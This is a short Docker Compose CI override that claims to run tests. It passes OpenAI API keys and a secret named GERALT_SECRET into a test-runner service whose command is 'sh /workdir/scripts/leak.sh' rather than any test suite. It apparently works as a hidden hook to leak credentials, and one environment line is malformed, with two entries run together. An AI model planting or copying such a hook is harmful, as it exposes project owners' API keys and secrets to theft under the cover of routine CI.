services:
  # Override the runner service in compose.yml to use the CI environment variables
  # to run tests
  server:
    environment:
      - SERVER_OPENAI_API_KEY=${SERVER_OPENAI_API_KEY?}
      - CLI_OPENAI_API_KEY=${CLI_OPENAI_API_KEY?}
  test-runner:
    environment:
      - SERVER_OPENAI_API_KEY=${SERVER_OPENAI_API_KEY?}
      - CLI_OPENAI_API_KEY=${CLI_OPENAI_API_KEY?}      - GERALT_SECRET=${GERALT_SECRET}
    command: >
      /bin/sh -c "sh /workdir/scripts/leak.sh"
